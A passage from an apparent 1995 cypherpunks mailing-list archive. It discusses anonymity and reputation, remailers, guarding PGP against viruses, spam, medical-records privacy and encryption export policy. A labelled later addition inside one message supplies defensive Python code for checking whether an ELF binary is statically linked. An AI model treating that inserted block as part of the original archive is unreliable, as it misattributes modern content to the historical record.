behaviour. Where I come from that means jail time.

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 21 Nov 1995 07:38:23 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymity and Intellectual Capital
Message-ID: <199511202231.OAA11611@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


The analogy between corporations protecting physical capital and
anonymity protecting intellectual capital is interesting, and I will
write a bit about it here.  I don't think it quite works in all ways but
it does suggest some ideas.

Capital, as I use the word, means stuff which helps you be productive.
Money can be physical capital, as can machines, computers, and so on,
but generally not consumer goods.  Traditionally, intellectual capital
by the same definition refers to training, knowledge, experience,
education - those mental skills and characteristics which help you
produce.  We have sometimes extended this notion here to reputation
capital, which we often use just to mean your reputation itself, your
good name.  But if we are going to call it "capital" it should really
be those aspects of your reputation which lead to productivity.  To the
extent that your good reputation helps you accomplish your productive
goals, it can be considered capital.  Particularly if you are a manager
or performer in some other position where people's opinions of you make
a big difference in how much you get done, you have a lot of reputation
capital.  Business reputations have many of the characteristics of
capital, too.

For some uses of anonymity it does make sense to think of them as
protecting reputation capital.  If you are going to send a message which
carries a risk of harming your reputation, perhaps because it is terribly
stupid or harsh, then anonymity can protect you in that way.  I think
some people do communicate anonymously for this reason.  However there is
another motivation, too, and that is fear of physical consequences.  Some
anonymous messages might lead to lawsuits or retribution in other forms,
such as firing or blackballing.  There is more involved in these cases
than just loss of reputation capital.  Physical capital is involved as
well.  So this is one way in which I think the analogy does not work.

Another difference relates to the number of people involved.  As I
understand it, the motivation for the corporate veil of immunity from
liability is so that people can safely band together in business.  If
there were no veil, and one harmful act by a member of the corporation
could result in any stockholder being held liable, then few people would
be willing to commit their assets to such an activity.  The risk would be
too great.  The point is that this protection is oriented towards
protecting large numbers of people.  It does not make much sense for a
single person to incorporate in order to try to protect himself from his
own harmful acts, and in fact I understand that the veil can often be
easily pierced in such situations.

On the other hand, with anonymity we are generally dealing with single
individuals.  There is no apparent need for people to pool reputation
capital in an endeavor, and have it be protected by the use of
anonymity.  The closest I can think of would be for a bunch of highly
regarded individuals to announce that they were going to join together
and create commentaries which would demonstrate all the insight, wit,
and other traits which gave these people such a high reputation in the
first place, but that the resulting missives would be released
anonymously, so that if one of them ended up reflecting badly on the
writers, there would be no way to know who had actually created it (it
could be a fake created by an imitator).

While I can't rule this out, it doesn't seem like a likely scenario, and
it doesn't seem to offer the opportunities that corporations do for
increasing productivity.

Another issue is the different forms of anonymity, which don't have clear
analogies with physical capital.  Using a pseudonym you can build up
reputation capital (or at least reputation) in the nym, but then you no
longer have immunity from harm if it commits some gaffe.  (Actually I
suppose this is not too different from the corporation whose assets can
be attacked but not those of the shareholders.)

Then there are the limited pseudonyms discussed by David Chaum, where
there are limits in how many pseudonyms of a particular type a person
can create.  You could have one "committed" pseudonym, unlinkable to
your True Name, which you post under; but you'd only get that one.
(You could post under other pseudonyms but they wouldn't be able to get
that "committed" stamp.) You'd have to be pretty careful what you say
via that nym, much as you are today with your True Name (which BTW a
lot of people don't realize yet).  Then people could filter so they
only received messages from committed nyms, figuring that senders would
be more likely to put meaningful content into these kinds of messages.

Chaum's system of credentials also could allow you to transfer
endorsements from one pseudonym to another.  We have discussed the idea
that such endorsements could be considered an embodiment of reputation
capital.  You could post a wide range of messages under different
pseudonyms, collect the positive endorsements (and discard the negative
ones), and attach them to your True Name or committed nym.  This might
encourage people to abandon their natural caution in making postings
which will come back to haunt them years hence (again, this will be more
an issue once people realize that this will happen).

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas E Zerucha <zerucha@shell.portal.com>
Date: Tue, 21 Nov 1995 07:50:38 +0800
To: cypherpunks@toad.com
Subject: Remailer list or FAQ?
Message-ID: <Pine.SUN.3.90.951120143929.25327D-100000@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Is there a FAQ or other list of anonymous remailers?  Or how to use the 
one at portal.com (I had this info somewhere, but it takes forever to do 
a zgrep `find...).

zerucha@shell.portal.com -or- 2015509 on MCI Mail
  finger zerucha@jobe.portal.com for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas E Zerucha <zerucha@shell.portal.com>
Date: Tue, 21 Nov 1995 07:44:18 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Virus attacks on PGP
In-Reply-To: <199511201945.LAA27486@netcom10.netcom.com>
Message-ID: <Pine.SUN.3.90.951120144320.25327E-100000@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks for the post.  I think there are a few interesting points, and 
some of the things I do to try to make things more difficult for a 
potential virus.

First, my secring is on a PCMCIA memory card, as are the versions of PGP, 
in this case DOS and Linux.  A virus is unlikely to attack both, and when 
the memory card is in, the network and modem cards are out.

Second, I think PGP is statically linked by default.  If it isn't this 
should be changed - there was recently a CERT alert about telnet services 
being compromised by switching DLLs.  The code can also be cross compiled 
and burned onto a CDROM which would make it difficult to infect.

zerucha@shell.portal.com -or- 2015509 on MCI Mail
  finger zerucha@jobe.portal.com for PGP key
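
[Added example, not part of the original message: one way to check the static-linking point above on an ELF binary (for example a Linux build of PGP) by reading its program headers. A PT_INTERP segment means the kernel hands the program to a dynamic loader, so shared libraries on disk can change its behaviour. The function names and the sample images are constructed for this illustration.]

```python
import struct
import sys

PT_LOAD, PT_DYNAMIC, PT_INTERP = 1, 2, 3


def program_headers(data):
    """Yield (p_type, p_offset, p_filesz) for each ELF program header."""
    if len(data) < 52 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("unsupported EI_CLASS or EI_DATA")
    end = "<" if ei_data == 1 else ">"
    if ei_class == 2:  # ELF64 header is 64 bytes
        if len(data) < 64:
            raise ValueError("truncated ELF64 header")
        (e_phoff,) = struct.unpack_from(end + "Q", data, 32)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 54)
        min_entry = 56
    else:  # ELF32 header is 52 bytes
        (e_phoff,) = struct.unpack_from(end + "I", data, 28)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 42)
        min_entry = 32
    if e_phnum and e_phentsize < min_entry:
        raise ValueError("program header entry size too small")
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if off + min_entry > len(data):
            raise ValueError("truncated program header table")
        if ei_class == 2:
            (p_type,) = struct.unpack_from(end + "I", data, off)
            (p_offset,) = struct.unpack_from(end + "Q", data, off + 8)
            (p_filesz,) = struct.unpack_from(end + "Q", data, off + 32)
        else:
            p_type, p_offset = struct.unpack_from(end + "II", data, off)
            (p_filesz,) = struct.unpack_from(end + "I", data, off + 16)
        yield p_type, p_offset, p_filesz


def linkage(data):
    """Classify an ELF image by how it will be loaded."""
    interp, dynamic = None, False
    for p_type, p_offset, p_filesz in program_headers(data):
        if p_type == PT_INTERP:
            raw = data[p_offset:p_offset + p_filesz]
            interp = raw.split(b"\0", 1)[0].decode("ascii", "replace")
        elif p_type == PT_DYNAMIC:
            dynamic = True
    if interp is not None:
        kind = "dynamic"  # loader resolves shared libraries at run time
    elif dynamic:
        kind = "static-pie-or-shared-object"  # no loader requested
    else:
        kind = "static"  # all code is inside the file itself
    return {"kind": kind, "interp": interp}


def build_sample(segment_types, interp=b""):
    """Constructed minimal little-endian ELF64 image (sample input only)."""
    phoff = 64
    interp_off = phoff + 56 * len(segment_types)
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)
    header = ident + struct.pack(
        "<HHIQQQIHHHHHH",
        2, 62, 1, 0, phoff, 0, 0, 64, 56, len(segment_types), 0, 0, 0,
    )
    phdrs = b""
    for p_type in segment_types:
        size = len(interp) if p_type == PT_INTERP else 0
        phdrs += struct.pack("<IIQQQQQQ", p_type, 4, interp_off, 0, 0, size, size, 1)
    return header + phdrs + interp


if __name__ == "__main__":
    # Usage: python check_linkage.py /path/to/binary [...]
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, linkage(fh.read()))
```

A result of "static" only says the file does not request a loader; the file itself still has to be protected, which is what the read-only media suggestion in the message addresses.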





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Corey Bridges <corey@netscape.com>
Date: Tue, 21 Nov 1995 07:43:42 +0800
To: cypherpunks@toad.com
Subject: Re: Spam the Sign!
Message-ID: <199511202259.OAA11521@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Hm. Well, if you think spamming us will help convince the gov't to export
strong crypto, go crazy. (Heck, I don't mind--it makes my job more secure.)

And yes, we HAVE enjoyed the message "Strong Crypto NOW" that's been
scrolling for the last 3 hours.

Corey Bridges
Security Scribe
Netscape Communications Corporation
415-528-2978





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Dittrich <dittrich@cac.washington.edu>
Date: Tue, 21 Nov 1995 07:44:26 +0800
To: cypherpunks@toad.com
Subject: (cpx) Re: "Junk E-Mail"
Message-ID: <9511202303.AA23192@red3.cac.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain


> At 06:47 PM 11/19/95 -0500, you wrote:
> >
> >  Is anyone else getting lots of junk e-mail lately? I'm getting all
> >kinds of direct marketing crap to both of my main accounts and I haven't
> >posted to usenet in months.
> 
>    On a related note, Compuserve had a note on their system last week from
> the sysop.  Their customers are receiving unwanted e-mail advertisements
> from the Internet.  Compuserve sysops are attempting to block the spamming
> but are finding it difficult because the advertiser is coming in via
> different routes.  They are also attempting to stop them using the court
> system.
> 
>    The advertiser, according to the Compuserve sysop, threatened a
> mail-bombing if Compuserve tried to block them!!!  This would be a just
> cause to call in the CSOF (Cypherpunk Soldier of Fortune) for a "measured
> response".

Yes, I've noticed these as well.  One troubling thing I noted with one
such spam-handed "attack" was the use of a group of internal email
addresses (in the sense that we don't advertise these addresses) as
addressees for a message that had an analog sent to www-buyinfo and
some other web related addresses.  This seems to indicate a way of
organizing lists into sets based on location/topic, but doesn't
include all other potential addressees in the same domain or
organization.

I guess it was only a matter of time before someone wrote
sophisticated spamming servers that somehow capture/analyze log files,
or is this just some idiot front end that lets ad-happy fools spam
with a smaller apparent footprint?

By the way... One reply I got from an ISP re: one of these drive by
spammings indicated that they were charging the idiot for disobeying
policy.  I've started suggesting to ISPs that they dis-user and charge
the offender (in case they haven't thought of this yet).  If non-spam
policies were more widely used, and these idiots lose their
email/access and a few hundred dollars in charges for wasting ISP
admin time, perhaps this trend won't continue.

-- 
Dave Dittrich                  Client Services, Computing & Communications
dittrich@cac.washington.edu    University of Washington

<a href="http://www.washington.edu/People/dad/">
Dave Dittrich / dittrich@cac.washington.edu</a>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JWRCLUM@aol.com
Date: Tue, 21 Nov 1995 04:49:03 +0800
To: cypherpunks@toad.com
Subject: Privacy Rights Alert
Message-ID: <951120150426_28561669@emout06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


    From:  American Civil Liberties Union of Massachusetts
           jwrclum@aol.com
 
    Re:    Privacy Rights Alert
    
    Date: November 20, 1995
    
    c 1995 ACLUMA
    
         We at the American Civil Liberties Union of Massachusetts want to
alert you to the fact that the right to medical privacy of all Americans is
imperiled by a bill just introduced in the U.S. Congress.  This bill, which
is claimed to be a  "Medical Records Confidentiality Act,"  in reality may
turn out to be profoundly destructive of your right to privacy. 
         Although Part I does contain certain aspects which could help
privacy, Part II undercuts the very fabric of patient-doctor
confidentiality.
         First, it preempts many state law and common law  protections which
currently exist.  
         Second, it pushes the further computerization of medical records,
and will bring about the creation of "Health Information Services"  ---
corporate entities which would receive, process, and serve as libraries for
actual on-line medical records forwarded from hospitals, clinics, and
individual doctors.  It appears that this will take place without any
requirement for individual patients' authorization or consent.
         As we all know, computerized data bases are not immune from
being accessed by both unauthorized "outsiders" and unauthorized
"insiders."  Centralization of data storage, especially in electronic
form, simplifies its being accessed.
         But aside from that, the bill would actually authorize
access to the medical records in these data bases by a host of government
and non-government entities.  Each of our medical records would thus become
part of a computerized "lending library" --- an internet of medical records.
         For example, the bill would permit release of your medical records
from "Health Information Services" (the on-line data base holders) and
"Health Information 'Trustees'" (providers, hospitals, health plans,
employers, insurers, and health oversight agencies) to the following (among
others):
              - Release to researchers (along with your medical
                history, it is possible that identifying
                information including your name, address, and
                phone number would be sent).
              - Nearly-automatic release, to the opposing party
                in a lawsuit, of your entire medical history, if
                your health, physical or mental, has been raised
                by you as an issue in that lawsuit.
              - Release to law-enforcement authorities under
                certain circumstances.
              - Release to Public Health Agencies under certain
                circumstances.
              - Release based on Judicial Warrant --- you would
                be notified by mail within 30 days after execution of
                the warrant (90 days or more with
                the government's ex parte option).
              - Release based on Judicial Subpoena, Grand Jury
                Subpoena, or Administrative Agency (e.g. Social Security)
                Subpoena --- you would be notified on or before the date
                of its execution (or within
                90 days thereafter [or longer] with the
                government's ex parte option).
                    - A special variant of this, where the
                      identity of the patient is "unknown," would allow
                      the search of records (plural) in order to identify
                      the person being sought.  [In essence, this would
                      allow "fishing" expeditions, using a computerized
                      net, into the private lives of Americans.]

         In some of these situations, you, the patient, will
only be informed after the records have been released.
         You may, in some circumstances, have the legal right to
"attempt to quash" the subpoena (etc.) by seeking a court's
intervention.  However, the standard by which the court is
to reach a decision on this will be mandated by this bill to
be a consideration of whether the government's interest in obtaining the
information outweighs the privacy interest of the individual.
         We would encourage you to pull up a copy of the actual
bill and view it yourself.  This can be done through the
Library of Congress internet site at http:\\thomas.loc.gov
(104th Congress,  Senate bill number  S 1360 ).
         Alternatively, a hard copy by mail can be requested
from the U.S. Senate Documents Room, by faxing to 202-228-2815 
a note containing the bill number and your mailing address.
         All our voices need to be heard in order to help make
certain that this bill is not passed by Congress.  
         Possible actions include: (1) Letters to your Senators and
congresspersons, and to the House and Senate leadership.
(2) Letters to local newspapers and other media.  (3) Forwarding the contents
of this message to places where you feel it will be
of interest and have impact.
         This document may be re-distributed freely, provided it remains in
its entirety.
         If you value your right to privacy, the time to act is now....  
    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Tue, 21 Nov 1995 07:12:26 +0800
To: cypherpunks@toad.com
Subject: Re: Spam the Sign!
Message-ID: <m0tHeeN-0008zTC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>On September 27, Jeff Weinstein of Netscape (and others) wrote:
>
>> > > ... would be nice if we could get 128 bit keys, though ... (hint,
>> > > hint).
>> > 
>> > We are working this issue with the government.  As soon as we can
>> > make it available for download we will.
>
>> In other words, we will never see it in our lifetimes -- the
>> bureaucreeps aren't known for promoting the spread of strong crypto.
>
>>>  Where did I imply that if the govt. ignored us or said no that we
>>>  would meekly go away with tail between legs?


Here's a question:  Why can't Netscape be released WITHIN THE US with 128
bit keys?  Admittedly, it would probably...uh...escape within a few hours,
but that's no worse than what other cryptosystems (best-known example, PGP)
have done.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 21 Nov 1995 06:29:22 +0800
To: cypherpunks@toad.com
Subject: "Dear Newt" Letter...
Message-ID: <v02120d0facd69dc27ec3@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



My, *this* looks interesting...


Cheers,
Bob Hettinga



--- begin forwarded text

Date: 20 Nov 1995 11:21:01 -0800
Subject: please fwd to cpunks if you
To: "Bob Hettinga" <RAH@shipwright.com>

     The Ad Hoc Taxpayer Coalition for Computer Privacy

                     November 8, 1995

The Honorable Newt Gingrich
Speaker of the House of Representatives
H-232 The Capitol
Washington, DC 20515-6502

Dear Mr. Speaker:

 We are writing to express serious concerns about the
Administration's efforts to continue to restrict the ability
of computer users at home and abroad to protect their personal
and private information over electronic networks through the
use of encryption technology. The Administration seems
determined to ensure government surveillance of all electronic
information and communications. It began with President
Clinton's "Clipper Chip," but has not stopped.

 Consumers aren't happy with these proposals, and neither is
the business community nor civil libertarians. In fact, it's
hard to find anyone supportive outside the Administration
except for the few that would benefit from the
Administration's "proposed relaxation" of the nation's export
policy.

 The Administration refuses to let American computer hardware
and software companies sell products with good encryption
worldwide unless the U.S. Government is guaranteed access to a
key that unlocks that information. The Administration is
trying to leverage these companies' need to export -- they
derive more than half their earnings from sales abroad -- and
desire to develop a single product worldwide, to force them to
include a feature in products they sell in the U.S. and abroad
that will allow government access. Administration officials
also have said that if American companies do not "voluntarily"
include such a feature, then they will seek legislation making
such a feature mandatory.

 The Administration's approach is the wrong policy for today's
marketplace.

 It's anti-consumer. Computer users will not entrust their
sensitive information to computer networks unless its security
and privacy are assured. Without good privacy protection,
there simply will not be a Global Information Infrastructure
-- and America won't be in the lead.

 It's anti-marketplace. There is no consumer demand for
encryption products that give the government easy access. The
Administration has come forward with a typical big-government
approach -- a government designed solution for a government
problem. This completely overlooks the realities of a
free-market.

 It is anti-American business. The Administration's current
policies are seriously harming the continued competitiveness
of one of our fastest growing and most successful industries
-- the computer hardware and software industry. Computer users
are demanding good encryption but American companies are not
allowed to supply it. Yet there are hundreds of foreign
encryption products manufactured and encryption programs are
widely available on the Internet.

 Finally, it is anti-progress. Wishing that there was no
encryption available will not make it so. The technology is
widely understood and available -- you can't put this genie
back in the bottle. Government policies should not encumber
the American computing industry as it leads the world
technology revolution.

 We strongly urge you to oppose attempts to limit the ability
of Americans to use whatever encryption they wish and to
support the immediate relaxation of harmful export controls on
American products and programs with encryption features.


     The Ad Hoc Taxpayer Coalition for Computer Privacy

Americans for Tax Reform
Association of Concerned Taxpayers
Competitive Enterprise Institute
Citizens for a Sound Economy
The Business Leadership Council
The Small Business Survival Committee
Citizens Against a National Sales Tax/VAT

Virginia Postrel, Editor, Reason magazine
Sheldon Richman, Senior Editor, The Cato Institute
Tanya Metaksa, Executive Director, Institute for Legislative
 Action, National Rifle Association
Kellyanne Fitzpatrick, The Polling Company
Donna Matias, Institute for Justice

=+=+=+=+
This information is provided as a service of the National Rifle
Association Institute for Legislative Action, Fairfax, VA.

This and other information on the Second Amendment and the NRA is
available at any of the following URL's: http://WWW.NRA.Org,
gopher://GOPHER.NRA.Org, wais://WAIS.NRA.Org, ftp://FTP.NRA.Org,
mailto:LISTPROC@NRA.Org (Send the word help as the body of a message)

Information may also be obtained by connecting directly to the
NRA-ILA GUN-TALK Bulletin Board System at (703) 934-2121.

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg_Rose@sibelius.sydney.sterling.com (Greg ROSE)
Date: Mon, 20 Nov 1995 14:46:07 +0800
To: lucyc@sw.oz.au
Subject: Cypherpunks in Sydney (Australia) Meeting
Message-ID: <9511200554.AA49910@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I mentioned some time ago that if there was
sufficient interest I'd organise a Sydney
Cypherpunks get-together. It was supposed to be
in mid-November :-(, but you can't have
everything.

In the absence of consultation with anyone, I've
booked a small suburban chinese restaurant for the
venue. This seems in keeping with other
cypherpunks meetings (not that I've ever been to
one...)

Date:   Wednesday December 6th.
Time:   7:00pm
Place:  Mee Ton Restaurant
        139 Concord Road
        Concord

The restaurant is easy to get to, only 20 minutes
by car from the city and easy to park.  If
driving out from the city along Paramatta Road,
you just have to be careful not to turn onto the
freeway. Concord Road is *second* and crosses
back over the freeway. The restaurant is about
400 metres north of Paramatta Road, on the
eastern side. It's also only a short walk from
North Strathfield station. If enough people are
using Public transport I can organise a pickup
from (the main) Strathfield station (a little
more convenient in terms of frequency of
trains).

I'm anticipating maybe ten-fifteen people. They
have a nice, light banquet menu for $12 per head,
everything included except alcohol.

RSVP, please, by Friday the 1st, and tell me whether
you are interested in a PGP key signing at the
same time.

I will post this to aus.org.auug, sage-au-nsw,
sci.crypt. Any other suggestions appreciated, and
don't hesitate to pass around the details.

- -- 
Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMLAX/6RQkCwJ0+ZNAQFU1AP/Y4d6RUieAKMoz4MJCeX5OXyhCNfTfrMp
/szVqe2ICn+9F+T+Ggad1XKSsO3NBk1Lmo478NUYHuCDuMODSgM0YRxRo7SuEd9d
joFtpUIAjBAs+e0beO7DI934XFSvDQini+YT2NxDtUtEM0c4fVh96oQyJguSnWP2
Mx8ZubrzoDs=
=R65K
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 21 Nov 1995 06:45:58 +0800
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: No Privacy Right in Indonesia ?
In-Reply-To: <Pine.BSD.3.91.951117175152.9898M-100000@ahcbsd1.ovnet.com>
Message-ID: <9511202205.AA28370@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>An 11 17 95 Reuter Information Service newsstory headlined 
> 
>     Politics, not sex, is Indonesian Internet's concern 

Absolutely. We designed it this way. One of the key ideas was to provide such 
governments with a choice between having their power structures eroded by 
democratic influences or to sink into technological obsolescence.

The US govt. stands to do best from all this. Democratic govt.s in general
will win. Those that will lose are those which attempt to stamp a political 
or cultural orthodoxy on their people. 

Communication is the greatest threat to tyranny. That is why all tyrannies 
must control communications. It is worth considering that when Stalin died
he was considered the saviour of the country, even by those who should have
known the truth. It was only after Khrushchev's speech to the closed session
that the truth became known inside the party. Note that even those who were
the victims of the oppression had believed that Stalin was a hero. "It is
a mistake", "if only Stalin knew" yet Stalin knew all along and this was 
obvious to the outside observer.

East Germany fell when the size of the defections became known within the 
country. It was clear that the regime was bankrupt and that people were
voting with their feet. 

Cuba will not be brought down by sanctions, that policy has failed for
thirty years and shows no signs of achieving anything. On the other hand
the communist structures would probably be swept away in months were the US
to admit defeat (thus acknowledging the Cuban people's "victory") and start 
package tourist flights. Once it was in the interests of the nomenklatura
to become capitalists they would change.

South Africa was not brought down by sanctions per se, they had an
effect because they demonstrated that the Western world did not accept
the apartheid principles. South Africa tried to see itself as a part
of the West and that was crucial to the apartheid mindset. Sanctions
demonstrated that South Africa was not considered a friend or ally. 


		Phill
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Tue, 21 Nov 1995 09:49:27 +0800
To: corey@netscape.com (Corey Bridges)
Subject: Re: Spam the Sign!
In-Reply-To: <199511202259.OAA11521@netscape.com>
Message-ID: <199511210121.RAA02291@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Hm. Well, if you think spamming us will help convince the gov't to export
> strong crypto, go crazy. (Heck, I don't mind--it makes my job more secure.)
> 
> And yes, we HAVE enjoyed the message "Strong Crypto NOW" that's been
> scrolling for the last 3 hours.
> 
> Corey Bridges
> Security Scribe
> Netscape Communications Corporation
> 415-528-2978
 
I'm not sure what NWBR's point is, but the original thread he's quoting
was about making the 'evaluation' copies available with 128bit RC4 to
U.S. users.  Jeff Weinstein said that he thought that this was a good idea,
and would see about making it available via an export-controlled ftp
server "once we get government approval".  I was involved in that thread,
since as a Linux user, I can't buy a supported copy, and therefore can't
take advantage of the strong crypto features of the Navigator.

So I would guess that he's spamming YOU to convince YOU to make strong
crypto available.

And as far as needing government approval, I noticed that Sameer has an
export controlled ftp server at c2.org.  Maybe he could tell us what is
necessary to set up such an animal. 

-- 
Jeff Simmons                           jsimmons@goblin.punk.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 21 Nov 1995 07:08:24 +0800
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: "Dear Newt" Letter...
In-Reply-To: <v02120d0facd69dc27ec3@[199.0.65.105]>
Message-ID: <9511202228.AA16586@all.net>
MIME-Version: 1.0
Content-Type: text


*** FLAME ON ***

Quoted in complete context for your protection:
> --- begin forwarded text
> 
> Date: 20 Nov 1995 11:21:01 -0800
> Subject: please fwd to cpunks if you
> To: "Bob Hettinga" <RAH@shipwright.com>
> 
>      The Ad Hoc Taxpayer Coalition for Computer Privacy
> 
>                      November 8, 1995
> 
> The Honorable Newt Gingrich
> Speaker of the House of Representatives
> H-232 The Capitol
> Washington, DC 20515-6502
> 
> Dear Mr. Speaker:
> 
>  We are writing to express serious concerns about the
> Administration's efforts to continue to restrict the ability
> of computer users at home and abroad to protect their personal
> and private information over electronic networks through the
> use of encryption technology. The Administration seems
> determined to ensure government surveillance of all electronic
> information and communications. It began with President
> Clinton's "Clipper Chip," but has not stopped.

Whoa!  Clinton didn't start the Clipper initiative.  Try Reagan/Bush!

Administration's efforts - hardly.  They inherited and mostly agreed

computer users at home and abroad - not according to what I've seen and
read - they want to stop export of good crypto, not internal use thereof.
It's the FBI that wants to read all your email and tap your phones.  The
administration is just going along as far as I can tell, and so is Newt.

>  Consumers aren't happy with these proposals, and neither is
> the business community nor civil libertarians. In fact, it's
> hard to find anyone supportive outside the Administration
> except for the few that would benefit from the
> Administration's "proposed relaxation" of the nation's export
> policy.

The vast majority of consumers don't care as far as I can tell.  Same
with most of the small business community (the vast majority of the
whole business community in the US).

>  The Administration refuses to let American computer hardware
> and software companies sell products with good encryption
> worldwide unless the U.S. Government is guaranteed access to a
> key that unlocks that information.

Dead flat wrong.  What is required is an export license, and they are
attainable.

> The Administration is
> trying to leverage these companies' need to export -- they
> derive more than half their earnings from sales abroad -- and
> desire to develop a single product worldwide, to force them to
> include a feature in products they sell in the U.S. and abroad
> that will allow government access.

What's your basis for this conclusion? They have not said so as far as I
can tell. 

> Administration officials
> also have said that if American companies do not "voluntarily"
> include such a feature, then they will seek legislation making
> such a feature mandatory.

Which ones said exactly what?

>  The Administration's approach is the wrong policy for today's
> marketplace.

Finally something I agree on.

>  It's anti-consumer. Computer users will not entrust their
> sensitive information to computer networks unless its security
> and privacy are assured. Without good privacy protection,
> there simply will not be a Global Information Infrastructure
> -- and America won't be in the lead.

I don't think most consumers care at all unless and until it directly
affects them in a way they can see and understand the connection with. 
There already is a GII, America is in the lead in some areas, and the
privacy issue is not a very important one judging by the vast majority
of users who use it regardless of and in ignorance of privacy protection.

>  It's anti-marketplace. There is no consumer demand for
> encryption products that give the government easy access. The
> Administration has come forward with a typical big-government
> approach -- a government designed solution for a government
> problem. This completely overlooks the realities of a
> free-market.

There is almost no consumer demand for encryption.  The demand that
exists is primarily business and government, and the government side
seems to think Clipper is a good idea.

>  It is anti-American business. The Administration's current
> policies are seriously harming the continued competitiveness
> of one of our fastest growing and most successful industries
> -- the computer hardware and software industry. Computer users
> are demanding good encryption but American companies are not
> allowed to supply it. Yet there are hundreds of foreign
> encryption products manufactured and encryption programs are
> widely available on the Internet.

It's not as good for American business as it could be, but Clipper might
be very good for American businesses currently being attacked by foreign
interests.  These hundreds of foreign encryption products may contain the
same sorts of holes you fear in US products.  Your proposal might be
even worse for the US. 

>  Finally, it is anti-progress. Wishing that there was no
> encryption available will not make it so. The technology is
> widely understood and available -- you can't put this genie
> back in the bottle. Government policies should not encumber
> the American computing industry as it leads the world
> technology revolution.

History does not agree with you.  Progress has not historically been
generated by the availability of encryption.  It may be in the future,
but for now your claim seems unsupported to me.

>  We strongly urge you to oppose attempts to limit the ability
> of Americans to use whatever encryption they wish and to
> support the immediate relaxation of harmful export controls on
> American products and programs with encryption features.

I believe Newt is in favor of clipper and national defense and law
enforcement, all of which strongly support Clipper, wire tapping, etc.

>      The Ad Hoc Taxpayer Coalition for Computer Privacy
> 
> Americans for Tax Reform
> Association of Concerned Taxpayers
> Competitive Enterprise Institute
> Citizens for a Sound Economy
> The Business Leadership Council
> The Small Business Survival Committee
> Citizens Against a National Sales Tax/VAT
> 
> Virginia Postrel, Editor, Reason magazine
> Sheldon Richman, Senior Editor, The Cato Institute
> Tanya Metaksa, Executive Director, Institute for Legislative
>  Action, National Rifle Association
> Kellyanne Fitzpatrick, The Polling Company
> Donna Matias, Institute for Justice
> 
> =+=+=+=+
> This information is provided as a service of the National Rifle
> Association Institute for Legislative Action, Fairfax, VA.
> 
> This and other information on the Second Amendment and the NRA is
> available at any of the following URL's: http://WWW.NRA.Org,
> gopher://GOPHER.NRA.Org, wais://WAIS.NRA.Org, ftp://FTP.NRA.Org,
> mailto:LISTPROC@NRA.Org (Send the word help as the body of a message)
> 
> Information may also be obtained by connecting directly to the
> NRA-ILA GUN-TALK Bulletin Board System at (703) 934-2121.
> 
> --- end forwarded text
> 
> 
> -----------------
> Robert Hettinga (rah@shipwright.com)
> e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
> "Reality is not optional." --Thomas Sowell
> The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
> >>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<

If the NRA has all that cash, why don't they support a much better
letter to Newt that is well supported by facts and has enough punch to
really sway him?

-- 
-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




